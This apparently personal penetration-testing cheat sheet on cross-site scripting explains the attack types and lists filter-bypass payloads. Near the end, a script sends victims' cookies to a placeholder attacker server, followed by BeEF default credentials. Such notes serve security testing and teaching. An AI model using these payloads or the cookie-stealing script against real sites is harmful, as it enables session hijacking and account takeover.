# Cross site scripting (XSS)

> Cross-site scripting is a type of computer security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Cross-site_scripting)

* [XSS Filter Evasion Cheat Sheet - OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
* [PayloadsAllTheThings/XSS Injection at master · swisskyrepo/PayloadsAllTheThings · GitHub](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection)
* [GitHub - mandatoryprogrammer/xsshunter: The XSS Hunter service - a portable version of XSSHunter.com](https://github.com/mandatoryprogrammer/xsshunter)
* [PortSwigger Cheat Sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
* [XSSMap](https://github.com/Jewel591/xssmap)

## Types of XSS

### Reflected (non-persistent)

> Javascript code sent in a request, e.g. via query parameters or form data, is reflected in the response.

E.g.:

```
https://domain.com/?error=<script>alert(1)</script>
```

To exploit victims you need an external delivery mechanism, like email, a tweet or other message.

### Stored (persistent)

> Javascript code gets stored on the server and displayed in an unsafe way to other users.

Entry points:

* URL query string
* Message body
* Request headers
* Any out-of-band routes

Exit points:

* All possible HTTP responses

-> Try to find links between entry and exit points.

E.g.:\
Use `<script>alert(1)</script>` as username, in a comment post, etc.

Via img: `<img src="." onerror="alert('test');" />`\
Via url: `<a href="javascript:alert('test')>test</a>`

As your payload is stored on the server, you don't an external delivery mechanism (as for reflected XSS), therefore stored XSS is generally considered a more severe vulnerability.

### DOM-based (client-side code)

> Attacker gets control over Javascript variables that are written to the DOM or used in methods like `eval()` or `innerHTML`.

#### HTML sinks

Place random alphanumeric strings into the source (e.g. `location.search`) and inspect the DOM using a browsers developer tools.

#### JS sinks

Using the browsers developer tools you can inspect and follow your input through the JavaScript code and check if/how it is sent to a sink.

See also [PortSwigger - Web Security Academy - Which sinks can lead to DOM-XSS vulnerabilities?](https://portswigger.net/web-security/cross-site-scripting/dom-based#which-sinks-can-lead-to-dom-xss-vulnerabilities).

**jQuery**

Sinks:

* `attr()`
* `$()`

**AngularJS**

Check for `ng-app` attribute, then use `{{...}}` to inject JavaScript.

### Blind

> Similar to "Stored", but you won't see the output/impact directly.\
> E.g.

* Submitting a contact form containing XSS

## Bypass WAF

### Tags and events

Use "Copy tags to clipboard" and "Copy events to clipboard" from [PortSwigger - XSS Cheat Sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) to detect unfiltered tags and events (e.g. using Burp Intruder).

### Custom tag

Trigger XSS using custom html tags.

```html
<bla id=blub onfocus=alert(1) tabindex=1>#blub
```

### SVG tag

Using animation and `onbegin` event:

```html
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><rect><animateTransform onbegin="alert(1)" /></rect></svg>
```

Using svg `animate` tag to set the `href` attribute for `a`nchor tag:

```html
<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me!</text></a></svg>
```

### Break out JS string

E.g. using:

```javascript
'-alert(1)-'
';alert(1)//'
```

### HTML encoding

Single quote, get's decoded first and then executed when used in event handlers like `onclick`.

```html
&apos;
```

### Template literals

Templates literals are encapsulated in backticks and `${...}` syntax can be used to evaluate JavaScipt inside them.

```javascript
document.getElementById('message').innerText = `user controllable data`; // inject e.g. ${alert(1)}
```

## Polyglots

[Xss JaVaSCRipt PoLYglOTs](https://dev.to/caffiendkitten/xss-javascript-polyglots-4i64)

## Iframe injection

```html
<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>
```

## Stealing cookies & sessions

Let the user request an image from your server and send his cookie as a GET param.

```javascript
<script>
new Image().src="https://<your-server>?cookie="+document.cookie;
</script> 
```

## BeEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.\
[BeEF - The Browser Exploitation Framework Project](https://github.com/beefproject/beef)

Start `./beef`\
Username: beef\
Password: beef